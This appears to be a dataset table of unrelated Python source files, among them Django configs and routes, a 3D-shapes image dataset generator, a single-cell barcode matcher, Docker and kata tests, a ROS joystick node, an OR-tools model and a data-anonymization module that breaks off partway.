content stringlengths 5 1.05M |
|---|
import sys
from django.apps import AppConfig
preload_models = {}
genre_rmap = {}
def load_model(model, task):
import numpy as np
import torch
import tensorflow as tf
import torch.nn.functional as F
import os
sys.path.append("..")
sys.path.extend([os.path.join(root, name) for root, dirs, _ in os.walk("..") for name in dirs])
from data_handler import DataHandler
from processor import Processor
from config import Config
from models.pretrain_model import PretrainModel
from models.vocab_model import VocabModel
def name_to_model(name, config):
if name == 'pretrain':
return PretrainModel(config)
if name == 'vocab':
return VocabModel(config)
raise NotImplementedError
use_cpu = False
epochs = 20
max_dialog_words = 64
vocab_dim = 32
dialog_dim = 128
feature_dim = 256
log_interval = 10
genre_map = np.load('/home/yukuo/movie-dialog-project/genre_map.npy', allow_pickle=True)[()]
global genre_rmap
for key, value in genre_map.items():
genre_rmap[value] = key
store = DataHandler(model, task, max_dialog_words)
config = Config(store, use_cpu, epochs, vocab_dim, dialog_dim, feature_dim, log_interval)
save_path = os.path.join('/home/yukuo/movie-dialog-project/result', '{}_{}_{}_{}_{}.ckpt'.format(model, task, vocab_dim, dialog_dim, feature_dim))
model = name_to_model(model, config)
model.load_state_dict(torch.load(save_path))
model.cuda()
return model
class MyappConfig(AppConfig):
name = 'myapp'
def ready(self):
if 'runserver' not in sys.argv:
return True
# you must import your modules here
# to avoid AppRegistryNotReady exception
# startup code here
global preload_models
preload_models['gender'] = load_model('vocab', 'gender')
preload_models['genre'] = load_model('vocab', 'genre')
preload_models['IMDB'] = load_model('vocab', 'IMDB')
|
""" Defines an example to create a dataset of an environment """
import argparse
import os
import random
from collections import namedtuple
from pdb import set_trace
from PIL import Image
from shapes3d import Shapes3D
ENV_DIM = 20
MAX_NUM_OBJS = 15
MIN_NUM_OBJS = 7
MIN_OBJ_DIM = 0.5
MAX_OBJ_DIM = 1.5
FOV = 45
PLANE_COLOR = [1, 1, 1]
TYPES = ['sphere', 'cube', 'cylinder', 'capsule']
Obj = namedtuple("Object", "x y collision_radius")
def generate_dataset(destination_folder, num_total_imgs, num_total_envs, num_eval_envs, width, height):
"""
Generates the images and saves them in destination. It will
create imgs/envs per envs.
"""
train, val = [], []
# Check if folder exists
check_folder_or_create(destination_folder)
# Create general environment
env = Shapes3D(gui=True, use_egl_plugin=False, env_dim=ENV_DIM, walls=True)
env.reset()
# Get instrinsic and extrinsic matrices
intrinsic = env.computeProjectionMatrixFOV(fov=FOV, aspect=1)
save_in_txt(os.path.join(destination_folder, "intrinsic_matrix.txt"), intrinsic)
for env_num in range(0, num_total_envs):
objs = [] # List of positions and dimenssion of objects
# Create folder if does not exits
check_folder_or_create(os.path.join(destination_folder, str(env_num)))
# Create objects
# Choose number of objects
num_obj = random.randint(MIN_NUM_OBJS, MAX_NUM_OBJS)
for _ in range(num_obj):
# Choose random color
r = random.uniform(0, 1)
g = random.uniform(0, 1)
b = random.uniform(0, 1)
color = [r, g, b, 1]
# Choose random type
obj_type = random.choice(TYPES)
collision_radius = None
dimension = None
# Choose random dims
if obj_type == "cube":
x = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
y = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
z = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
dimension = [x, y, z]
collision_radius = max([x, y])
z_pos = z
else:
dimension = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)
if obj_type in ["cylinder", "capsule"]:
collision_radius = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)
z_pos = dimension/2
else:
collision_radius = dimension
z_pos = collision_radius
# Choose random position
while True:
min_pos = ENV_DIM/2 - collision_radius
x_pos = random.uniform(-min_pos, min_pos)
y_pos = random.uniform(-min_pos, min_pos)
# Check if objects are far enough
if check_collisions(x_pos, y_pos, collision_radius, objs):
objs.append(Obj(x=x_pos, y=y_pos, collision_radius=collision_radius))
break
position = [x_pos, y_pos, z_pos]
if obj_type == "cube":
env.add_cube(dimension, color, position)
elif obj_type == "sphere":
env.add_sphere(dimension, color, position)
elif obj_type == "capsule":
env.add_capsule(collision_radius, dimension, color, position)
elif obj_type == "cylinder":
env.add_cylinder(collision_radius, dimension, color, position)
# Choose a random pose and orientation for camera
for img_num in range(int(num_total_imgs/num_total_envs)):
epsilon = 0.1
range_dis = ENV_DIM / 2 - epsilon
while True:
succ1, img1, depth1, _, pos, ori = get_cam_render(
[0, 0, 0],
[[-range_dis, range_dis], [-range_dis, range_dis], [MIN_OBJ_DIM, MAX_OBJ_DIM]],
[0, 0, 0],
[[0, 0], [0, 10], [0, 360]],
width, height,
intrinsic,
env, objs)
if succ1 is False:
continue
x_cam, y_cam, z_cam = pos
roll, pitch, yaw = ori
# Move the camera
for _ in range(20):
succ2, img2, depth2, _, dpos2, dori2 = get_cam_render(
[x_cam, y_cam, z_cam], [[-MIN_OBJ_DIM, MIN_OBJ_DIM]] * 3,
[roll, pitch, yaw], [[0, 0], [-5, 5], [-5, 5]],
width, height,
intrinsic,
env, objs)
if succ2 is True:
dx2, dy2, dz2 = dpos2
droll2, dpitch2, dyaw2 = dori2
# Second movement
for _ in range(20):
succ3, img3, depth3, _, dpos3, dori3 = get_cam_render(
[x_cam - dx2, y_cam - dy2, z_cam - dz2],
[[-MIN_OBJ_DIM, MIN_OBJ_DIM]] * 3,
[roll, pitch, yaw], [[0, 0], [-5, 5], [-5, 5]],
width, height,
intrinsic,
env, objs)
if succ3 is True:
dx3, dy3, dz3 = dpos3
droll3, dpitch3, dyaw3 = dori3
break
if succ2 and succ3:
break
if succ2 and succ3:
break
# Save the picture
dest = os.path.join(destination_folder, str(env_num))
img_dest = os.path.join(dest, '%s.jpg')
depth_dest = os.path.join(dest, '%s.npy')
dof_dest = os.path.join(dest, "%s_6dof.txt")
# Imgs
img1 = Image.fromarray(img1[:, :, :3])
img2 = Image.fromarray(img2[:, :, :3])
img3 = Image.fromarray(img3[:, :, :3])
img2.save(img_dest % (str(img_num) + "_a"))
img1.save(img_dest % (str(img_num) + "_b"))
img3.save(img_dest % (str(img_num) + "_c"))
# Depths
depth2.dump(depth_dest % (str(img_num) + "_a"))
depth1.dump(depth_dest % (str(img_num) + "_b"))
depth3.dump(depth_dest % (str(img_num) + "_c"))
if env_num < num_eval_envs:
val.append((str(env_num), str(img_num)))
else:
train.append((str(env_num), str(img_num)))
# Extrinsic
save_in_txt(dof_dest % (str(img_num) + "_btoa"),
[dx2, dy2, dz2, droll2, dpitch2, dyaw2])
save_in_txt(dof_dest % (str(img_num) + "_btoc"),
[dx3 - dx2, dy3 - dy2, dz3 - dz2, droll3, dpitch3, dyaw3])
# Clean environment
env.reset()
# Save split values
train = random.sample(train, len(train))
val = random.sample(val, len(val))
train = [' '.join(x) for x in train]
val = [' '.join(x) for x in val]
save_in_txt(os.path.join(destination_folder, "train.txt"), train, '\n')
save_in_txt(os.path.join(destination_folder, "val.txt"), val, '\n')
def get_cam_render(pos0, pos_range, ori0, ori_range, width, height, intrinsic, env, objs):
""" Creates a render based on arguments and checks if img contains objs """
distance = 1e-5
img, depth, seg, dpos, dori = [None]*5
x_cam, y_cam, z_cam = pos0
x_rang, y_rang, z_rang = pos_range
roll, pitch, yaw = ori0
roll_rang, pitch_rang, yaw_rang = ori_range
dx = random.uniform(*x_rang)
dy = random.uniform(*y_rang)
dz = random.uniform(*z_rang)
x_cam2 = x_cam + dx
y_cam2 = y_cam + dy
z_cam2 = z_cam + dz
position = [x_cam2, y_cam2, z_cam2]
# Check position
if not check_collisions(x_cam2, y_cam2, MIN_OBJ_DIM*2, objs):
return False, img, depth, seg, dpos, dori
# Check position
if abs(x_cam2) > ENV_DIM/2 or abs(y_cam2) > ENV_DIM/2:
return False, img, depth, seg, dpos, dori
droll = random.uniform(*roll_rang)
dpitch = random.uniform(*pitch_rang)
dyaw = random.uniform(*yaw_rang)
roll2 = roll + droll
pitch2 = pitch + dpitch
yaw2 = yaw + dyaw
# Render
extrinsic = env.computeViewMatrixFromYawPitchRoll(
position, distance, yaw2, pitch2, roll2)
img, depth, seg = env.compute_render(width, height, intrinsic, extrinsic)
# Check if position renders at least two objects
seg = set(seg.reshape(1, -1).tolist()[0]) # Removing repeations
seg = seg.difference([-1]+env.walls_id) # Removing plane_id
if env.plane_id in seg and len(seg) > 3:
dpos = [dx, dy, dz]
dori = [droll, dpitch, dyaw]
return True, img, depth, seg, dpos, dori
else:
return False, img, depth, seg, dpos, dori
def save_in_txt(destination, array, char=' '):
""" saves array elements in destination with spaces between values """
if os.path.exists(destination):
os.remove(destination)
with open(destination, 'w') as txt:
txt.write(char.join([str(i) for i in array]))
def check_collisions(x, y, collision_radius, objs):
"""
Checks if the position x,y collide with any obj in objs with a
collision_raidus of collision_radius
"""
epsilon = 0.2
for obj in objs:
if (obj.x - x)**2 + (obj.y - y)**2 <= \
(obj.collision_radius + collision_radius + epsilon)**2:
return False
return True
def check_folder_or_create(folder):
""" Checks if the folder exits, if not it creates it """
if not os.path.exists(folder):
print("Creating folder %s" % folder)
os.makedirs(folder)
if __name__ == '__main__':
# get params: number of images, number of envs and folder
parser = argparse.ArgumentParser(
description="Arguments to generate a dataset using this environment")
parser.add_argument('-f', '--destination', type=str, default="dataset_generated",
help="Folder destination for the dataset files")
parser.add_argument('-i', '--num_total_imgs', type=int, default=100,
help="Number of images to generate in total")
parser.add_argument('-e', '--num_total_envs', type=int, default=10,
help="Number of environments to generate")
parser.add_argument('--num_eval_envs', type=int, default=2,
help="Number of environments used in evaluation")
parser.add_argument('--width', type=int, default=300,
help="Width in pixels of the images")
parser.add_argument('--height', type=int, default=300,
help="Width in pixels of the images")
args = parser.parse_args()
generate_dataset(args.destination, args.num_total_imgs, args.num_total_envs, args.num_eval_envs, width=args.width, height=args.height)
|
from django.conf import settings
from django.conf.urls.defaults import *
from satchmo.configuration import config_value
from satchmo.product.urls import urlpatterns as productpatterns
from satchmo.shop import get_satchmo_setting
from satchmo.utils import app_enabled
urlpatterns = get_satchmo_setting('SHOP_URLS')
urlpatterns += patterns('satchmo.shop.views',
(r'^$','home.home', {}, 'satchmo_shop_home'),
(r'^add/$', 'smart.smart_add', {}, 'satchmo_smart_add'),
(r'^cart/$', 'cart.display', {}, 'satchmo_cart'),
(r'^cart/accept/$', 'cart.agree_terms', {}, 'satchmo_cart_accept_terms'),
(r'^cart/add/$', 'cart.add', {}, 'satchmo_cart_add'),
(r'^cart/add/ajax/$', 'cart.add_ajax', {}, 'satchmo_cart_add_ajax'),
(r'^cart/qty/$', 'cart.set_quantity', {}, 'satchmo_cart_set_qty'),
(r'^cart/qty/ajax/$', 'cart.set_quantity_ajax', {}, 'satchmo_cart_set_qty_ajax'),
(r'^cart/remove/$', 'cart.remove', {}, 'satchmo_cart_remove'),
(r'^cart/remove/ajax$', 'cart.remove_ajax', {}, 'satchmo_cart_remove_ajax'),
(r'^checkout/', include('satchmo.payment.urls')),
(r'^contact/$', 'contact.form', {}, 'satchmo_contact'),
(r'^history/$', 'orders.order_history', {}, 'satchmo_order_history'),
(r'^tracking/(?P<order_id>\d+)/$', 'orders.order_tracking', {}, 'satchmo_order_tracking'),
(r'^search/$', 'search.search_view', {}, 'satchmo_search'),
# Override comments with our redirecting view. You can remove the next two
# URLs if you aren't using ratings.
#(r'^comments/post/$', 'comments.post_rating', {'maxcomments': 1 }, 'satchmo_rating_post'),
(r'^comments/', include('django.contrib.comments.urls')),
# Used for downloadable products.
(r'^download/process/(?P<download_key>\w+)/$', 'download.process', {}, 'satchmo_download_process'),
(r'^download/send/(?P<download_key>\w+)/$', 'download.send_file', {}, 'satchmo_download_send'),
)
# here we add product patterns directly into the root url
urlpatterns += productpatterns
if app_enabled('l10n'):
urlpatterns += patterns('',
# Used to set the default language.
(r'^i18n/', include('satchmo.l10n.urls'))
)
if app_enabled('wishlist'):
urlpatterns += patterns('',
('wishlist/', include('satchmo.wishlist.urls')),
)
urlpatterns += patterns('django.views.generic',
(r'^contact/thankyou/$','simple.direct_to_template',{'template':'thanks.html'},'satchmo_contact_thanks'),
)
|
#!/usr/bin/env python
"""
:Author: Ji Research Group/Stanford Genome Technology Center
:Contact: sgrimes@stanford.edu
:Creation date: 03/24/2021
:Description:
This script extracts soft clipped bases at beginning (FWD strand) or end (REV strand)
of read. These sequences will subsequently be searched for expected single cell barcode sequences.
Revisions:
- 03/26/2021 Import reusable methods from sc_barcodes
- 04/28/2021 Add nbest command line argument
"""
import argparse, sys, os, re, pysam, csv, gzip, string, distance
import numpy as np, pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from scipy.sparse import csr_matrix
import sc_barcodes as scb
script_name = os.path.basename(__file__)
print("Running ", script_name)
#Use SEARCH_OFFSET is desired to ignore part of 13bp 10X adapter, and 10bp UMI during matching processs
SEARCH_OFFSET = 0
MAX_SEARCH_LEN = 55-SEARCH_OFFSET
MIN_SCORE = 0.0
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Define internal modules #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
def parse_commandline():
parser=argparse.ArgumentParser()
parser.add_argument('--bam', '-b', help='input bam file', type=str, required=True)
parser.add_argument('--barcodes', '-c', help='cellranger barcodes file', type=str, required=True)
parser.add_argument('--strand', '-s', help='gene strand', type=str, required=True, choices=['plus','minus','both'])
parser.add_argument('--exonrds', '-x', help='reads with exon skipping pattern identified', type=str, required=False)
parser.add_argument('--kmer_len', '-k', help='k-mer length', type=int, required=False, default=8)
parser.add_argument('--nbest', '-n', help='number of best matches to evaluate', type=int, required=False, default=5)
args=parser.parse_args()
print(args, file=sys.stderr)
return args
def debug_samrd(samrd):
strand = 'Rev' if samrd.is_reverse else 'Fwd'
return [samrd.qname[-16:], strand, samrd.tid, samrd.pos]
def best_barcodes(string, barcodes, barcode_tfidf, vectorizer, nbest=5):
best_barcodes = [['N',0]]
barcode_seq_tfidf = vectorizer.transform([string])
cos_sim = cosine_similarity(barcode_seq_tfidf, barcode_tfidf, dense_output=False)
non_zero = [((i, j), cos_sim[i,j]) for i, j in zip(*cos_sim.nonzero())]
nz_sorted = sorted(non_zero, key=lambda x: -x[1])
idx_nbest = [x[0][1] for x in nz_sorted[0:nbest] if x[1] > MIN_SCORE]
if len(idx_nbest) > 0:
best_barcodes = zip([barcodes[i] for i in idx_nbest], [cos_sim[(0,i)] for i in idx_nbest])
return best_barcodes
def format_bc_string(soft_clips, strand, bc_start):
bc_end = pos+16
if strand == 'fwd': #positions will all be -ve offsets from end of sequence
r1_adapter = soft_clips[max(bc_start-22, 0):bc_start]
barcode = soft_clips[bc_start:bc_end]
umi = soft_clips[bc_end:min(bc_end+10, len(soft_clips))]
return '|'.join([r1_adapter, barcode, umi])
else:
umi = soft_clips[max(bc_start-10, 0):bc_start]
barcode = soft_clips[bc_start:bc_end]
r1_adapter = soft_clips[bc_end:min(bc_end+22, len(soft_clips))]
return '|'.join([scb.reverse_complement(r1_adapter), scb.reverse_complement(barcode), scb.reverse_complement(umi)])
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Check for valid arguments, and that files exist #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
args = parse_commandline()
KMER_LEN = args.kmer_len
NBEST = args.nbest
sam_input = pysam.Samfile(args.bam,'rb') if args.bam[-3:] == 'bam' else pysam.Samfile(args.bam,'r')
sam_fname = os.path.basename(args.bam)
if args.barcodes.endswith('gz'):
barcode_input = gzip.open(args.barcodes, 'r')
barcodes = [line[:16].decode('ascii') for line in barcode_input]
else:
barcode_input = open(args.barcodes, 'r')
barcodes = [line[:16] for line in barcode_input]
xskip_fn = args.exonrds
try:
out_fn = sam_fname[0:-4] + '.softclip.bestN.txt'
out_file = open(out_fn, 'w')
out_csv = csv.writer(out_file, delimiter="\t", quoting=csv.QUOTE_MINIMAL)
except:
print("Unable to open text file for output: ", out_fn)
sys.exit(1)
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Vectorize barcodes #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
#https://bergvca.github.io/2017/10/14/super-fast-string-matching.html
def ngrams(string, kmer_len=KMER_LEN):
ngrams = zip(*[string[i:] for i in range(kmer_len)])
return [''.join(ngram) for ngram in ngrams]
#build kmer dictionary of all barcode seqs (in both forward and reverse orientation)
vectorizer_fwd = CountVectorizer(min_df=1, analyzer=ngrams)
fwd_barcode_tfidf = vectorizer_fwd.fit_transform(barcodes)
vectorizer_rev = CountVectorizer(min_df=1, analyzer=ngrams)
rev_barcode_tfidf = vectorizer_rev.fit_transform([scb.reverse_complement(barcode) for barcode in barcodes])
if args.exonrds:
xskip_rdnames = pd.read_csv(xskip_fn, sep='\t', header=None, index_col=0)
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Read sam file and check for soft-clips at beginning or end of read #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Expected sequence (FWD), soft clips indicated by []
# [Illumina R1 adapter][cell barcode][UMI][10X internal adapter] cDNA [polyA][adapter]
#
# Expected sequence (REV), soft clips indicated by []
# [adapter][polyT] cDNA [10X internal adapter][UMI][barcode][Illumina R1 adapter]
i = 0; tot_rds = 0; adapter_flank_bp = 6; last_qname = 'none';
out_csv.writerow(['rd_name', 'exon_skip', 'strand', 'barcode', 'score', 'dist', 'pos', 'adapter|BC|UMI', 'search_len', 'align_start', 'align_end'])
sc_3or5 = '5prime' if args.strand == 'plus' else '3prime'
for samrd in sam_input.fetch(until_eof=True):
i += 1
if samrd.is_secondary:
continue
if args.exonrds and samrd.qname in xskip_rdnames.index:
xskip_pattern = xskip_rdnames.loc[samrd.qname,1]
elif args.exonrds:
continue
else:
xskip_pattern = None
align_strand = 'minus' if samrd.is_reverse else 'plus'
tot_rds += 1
soft_clips = scb.extract_softclips(samrd)
barcodes_scores = [['N', 0]]
if args.strand == 'plus':
sc_5prime_len = len(soft_clips['fwd'])
if sc_5prime_len > 16+SEARCH_OFFSET+1:
#Working backwards from end of soft clipped sequence (s/b 10X adapter, then UMI, then cell barcode) - determine start position for cell barcode search
i_start = max(sc_5prime_len-MAX_SEARCH_LEN-SEARCH_OFFSET, 0)
search_seq = soft_clips['fwd'][i_start:-SEARCH_OFFSET] if SEARCH_OFFSET > 0 else soft_clips['fwd'][i_start:]
barcode_scores = best_barcodes(search_seq, barcodes, fwd_barcode_tfidf, vectorizer_fwd, NBEST)
else: # args.strand == 'minus':
sc_3prime_len = len(soft_clips['rev'])
if sc_3prime_len > 16+SEARCH_OFFSET+1:
i_end = min(MAX_SEARCH_LEN+SEARCH_OFFSET, sc_3prime_len)
search_seq = soft_clips['rev'][SEARCH_OFFSET:i_end]
barcode_scores = best_barcodes(search_seq, barcodes, rev_barcode_tfidf, vectorizer_rev, NBEST)
for bc_score in barcode_scores:
if bc_score[0] != "N":
if args.strand == 'plus':
[dist, pos] = scb.calc_edit_distance(bc_score[0], search_seq, 16)
barcode_with_flanking = format_bc_string(search_seq, 'fwd', pos)
bc_pos = pos-len(search_seq)
else: #args.strand == 'minus'
[dist, pos] = scb.calc_edit_distance(scb.reverse_complement(bc_score[0]), search_seq, 16)
barcode_with_flanking = format_bc_string(search_seq, 'rev', pos)
bc_pos = pos
out_csv.writerow([samrd.qname, xskip_pattern, align_strand, bc_score[0], bc_score[1], dist, bc_pos, barcode_with_flanking, len(search_seq),
samrd.reference_start, samrd.reference_end])
if dist < 2: break
print(i, "sam records read")
print("Evaluated", tot_rds, "primary (full transcript) alignments")
for fh in [sam_input, barcode_input, out_file]:
fh.close()
|
import logging
import pytest
from pytest_docker_py.config import Config
from pytest_docker_py.docker_py_wrapper import DockerPyWrapper
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)8s --- [%(process)5d] %(filename)25s:%(funcName)30s, %(lineno)3s: %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.DEBUG)
logging.getLogger('docker').setLevel(logging.DEBUG)
logging.getLogger('urllib3').setLevel(logging.DEBUG)
docker_py_wrapper = DockerPyWrapper()
@pytest.fixture
def configuration():
return Config([{'image': 'alpine:latest',
'name': 'alpine-01',
'ports': {'1234/tcp': 1234},
'volumes': {'alpine-01': {'bind': '/tmp', 'mode': 'rw'}},
'command': 'sleep 12345'},
{'image': 'busybox:latest',
'name': 'busybox-01',
'network': 'docker_py_wrapper'}
])
def test_configuration(configuration):
assert configuration.images() == ['alpine:latest', 'busybox:latest']
assert configuration.networks() == ['docker_py_wrapper']
@pytest.mark.timeout(30)
def test_pull_images(configuration):
docker_py_wrapper.rm_images(configuration.images())
for configuration_image in configuration.images():
assert configuration_image not in docker_py_wrapper.ls_images()
docker_py_wrapper.pull(configuration.images())
for configuration_image in configuration.images():
assert configuration_image in docker_py_wrapper.ls_images()
def test_stop_start_containers(configuration):
docker_py_wrapper.start_containers(configuration)
assert len(docker_py_wrapper.ls_containers(configuration.images())) == 2
assert docker_py_wrapper.ls_networks(configuration.networks()) == ['docker_py_wrapper']
assert docker_py_wrapper.ls_volumes(configuration.volumes()) == ['alpine-01']
docker_py_wrapper.rm_containers(configuration.images())
assert docker_py_wrapper.ls_containers(configuration.images()) == []
assert docker_py_wrapper.ls_networks(configuration.networks()) == []
assert docker_py_wrapper.ls_volumes(configuration.volumes()) == []
|
# -*- coding: utf-8
from __future__ import absolute_import, unicode_literals
DEBUG = True
USE_TZ = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "-#5o&sf4iu8&-@na$ad*(t)0gl6_gnw-7_=mk5!zcck)p0w&30"
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
}
ROOT_URLCONF = "tests.urls"
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"plans",
"paypal.standard.ipn",
"plans_paypal",
]
SITE_ID = 1
PAYPAL_BUSSINESS_EMAIL = "fake@email.com"
MIDDLEWARE = ("author.middlewares.AuthorDefaultBackendMiddleware",)
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": False,
"OPTIONS": {
"debug": True,
"context_processors": [
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
"loaders": (
"admin_tools.template_loaders.Loader",
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
),
},
},
]
|
#!/usr/bin/env python
import math
import rospy
from sensor_msgs.msg import Joy
from pan_tilt_msg.msg import PanTiltCmd
delta_value = 2
pan_tilt_yaw = 0.0
pan_tilt_pitch = 0.0
publisher = 0
def joy_callback(data):
global publisher
global pan_tilt_yaw, pan_tilt_pitch
# button Y
if data.buttons[0]==1 :
pan_tilt_pitch -= delta_value
# rospy.loginfo("up")
# button B
if data.buttons[1]==1:
pan_tilt_yaw -= delta_value
# rospy.loginfo("right")
# button A
if data.buttons[2]==1:
pan_tilt_pitch += delta_value
# rospy.loginfo("down")
# button X
if data.buttons[3]==1:
pan_tilt_yaw += delta_value
# rospy.loginfo("left")
# button RB
if data.buttons[5]==1:
pan_tilt_pitch = 0;
pan_tilt_yaw = 0;
# rospy.loginfo("reset")
if(pan_tilt_pitch > 60):
pan_tilt_pitch = 60;
if(pan_tilt_pitch < -60):
pan_tilt_pitch = -60;
if(pan_tilt_yaw > 60):
pan_tilt_yaw = 60;
if(pan_tilt_yaw < -60):
pan_tilt_yaw = -60;
command = PanTiltCmd()
command.speed = 20.0
command.yaw = pan_tilt_yaw
command.pitch = pan_tilt_pitch
publisher.publish(command)
def main():
global publisher
rospy.init_node("pan_tilt_control_node")
rospy.Subscriber("joy", Joy, joy_callback)
publisher = rospy.Publisher('/pan_tilt_driver_node/pan_tilt_cmd', PanTiltCmd, queue_size=10)
rospy.loginfo("PanTilt Control Start")
rospy.spin()
if __name__ == '__main__':
main() |
import unittest
from katas.kyu_8.hex_to_decimal import hex_to_dec
class HexToDecimalTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(hex_to_dec("1"), 1)
def test_equal_2(self):
self.assertEqual(hex_to_dec("a"), 10)
def test_equal_3(self):
self.assertEqual(hex_to_dec("10"), 16)
|
# Copyright 2021 Hakan Kjellerstrand hakank@gmail.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in OR-tools CP-SAT Solver.
From the OPL model volsay.mod
Using arrays.
This is a port of my old LP model volsay2.py
This model was created by Hakan Kjellerstrand (hakank@gmail.com)
Also see my other OR-tools models: http://www.hakank.org/or_tools/
"""
from __future__ import print_function
from ortools.sat.python import cp_model as cp
import math, sys
# from cp_sat_utils import *
def main():
model = cp.CpModel()
# data
num_products = 2
Gas = 0
Chloride = 1
products = ['Gas', 'Chloride']
# declare variables
production = [
model.NewIntVar(0, 100000, 'production[%i]' % i)
for i in range(num_products)
]
#
# constraints
#
model.Add(production[Gas] + production[Chloride] <= 50)
model.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)
# objective
model.Maximize(40 * production[Gas] + 50 * production[Chloride])
#
# solution and search
#
solver = cp.CpSolver()
status = solver.Solve(model)
if status == cp.OPTIMAL:
print('objective = ', solver.ObjectiveValue())
for i in range(num_products):
print(products[i], '=', solver.Value(production[i]), end=' ')
print()
print()
print("NumConflicts:", solver.NumConflicts())
print("NumBranches:", solver.NumBranches())
print("WallTime:", solver.WallTime())
print()
if __name__ == '__main__':
main()
|
import random
from datetime import date, datetime, timedelta
from decimal import Decimal
from enum import Enum, auto
from typing import TypeVar, Union
from faker import Faker
T = TypeVar("T", float, int, Decimal, bytes, bool, str, date, datetime)
S = TypeVar("S", str, date, datetime)
U = TypeVar("U", int, float, Decimal, date, datetime)
FAKER = Faker()
class Strategies(Enum):
"""All supported anonymization strategies."""
SUPPRESS = auto()
"""Suppresses the input field by returning a static anonymous string. Only works with string fields."""
PARTIAL_SUPPRESS = auto()
"""
Returns a partially suppressed string based on the given input pattern.
The input pattern can consit of any character, but '*'s will overwrite
the character in the input. The pattern and value must always be the same
length.
>> ex. the value "012 345 6789" with pattern "*** *** XXXX" returns "*** *** 6789"
"""
MOCK = auto()
"""
Returns a new value given the requested mocking type. Currently, only
address, full name, and datetime, and date mocks are available. Fields must
be the correct type in order to be mockable with the given method.
"""
VARY = auto()
"""
Returns a new value, with variance picked from a Gaussian distribution with a mean
of the current value and a given standard deviation.
If the value is a date or datetime, the variance is in days.
"""
class MockTypes(Enum):
"""
All supported mock types.
Each type is a valid provider in the Faker library <https://faker.rtfd.org/en/master/providers.html>.
"""
ADDRESS = auto()
"""Generates single-line full addresses in the United States."""
DATETIME = auto()
"""Generates dates or datetimes within any UNIX epoch."""
NAME = auto()
"""Generates random English full names."""
def suppress(v: str, *args) -> str:
"""Suppresses the input field by returning a static anonymous string."""
if not isinstance(v, str):
raise TypeError("Supression only works on strings.")
return "<CONFIDENTIAL>"
def partial_suppress(v: str, *args: str) -> str:
"""
Returns a partially suppressed string based on the given input pattern.
The input pattern can consit of any character, but '*'s will overwrite
the character in the input. The pattern and value must always be the same
length.
>> ex. the value "012 345 6789" with pattern "*** *** XXXX" returns "*** *** 6789"
"""
if not isinstance(v, str):
raise TypeError("Partial suppression only works with strings.")
elif not (len(args) == 1 and isinstance(args[0], str)):
raise TypeError("Partial suppression requires a string pattern argument.")
elif not len(v) == len(args[0]):
raise ValueError("Mismatching value and pattern lengths.")
return "".join([p if p == "*" else c for c, p in zip(v, args[0])])
def mock(v: S, *args) -> S:
"""
Returns a new value given the requested mocking type. Currently, only
address, full name, and datetime, and date mocks are available. Fields must
be the correct type in order to be mockable with the given method.
"""
if not isinstance(v, (str, date, datetime)):
raise TypeError("Mock anonymization only works with supported fields.")
elif not (len(args) == 1 and isinstance(args[0], MockTypes)):
raise TypeError("Mock anonymization must be given a specific mock type.")
mock_type = args[0]
if mock_type == MockTypes.ADDRESS:
if not isinstance(v, str):
raise TypeError("Address mocking can only be done with text fields.")
return FAKER.address() # type: ignore
elif mock_type == MockTypes.NAME:
if not isinstance(v, str):
raise TypeError("Name mocking can only be done with text fields.")
return FAKER.name() # type: ignore
elif mock_type == MockTypes.DATETIME:
if not isinstance(v, datetime):
raise TypeError("Datetime mocking can only be done with datetime fields.")
return FAKER.date_time() # type: ignore
else:
if not isinstance(v, date):
raise TypeError("Date mocking can only be done with datetime fields.")
return FAKER.date_time().date() # type: ignore
def vary(v: U, *args: Union[float, int]) -> U:
"""
Returns a new value, with variance picked from a Gaussian distribution with a mean
of the current value and a given standard deviation.
If the value is a date or datetime, the variance is in days.
"""
if not isinstance(v, (int, float, Decimal, date, datetime)):
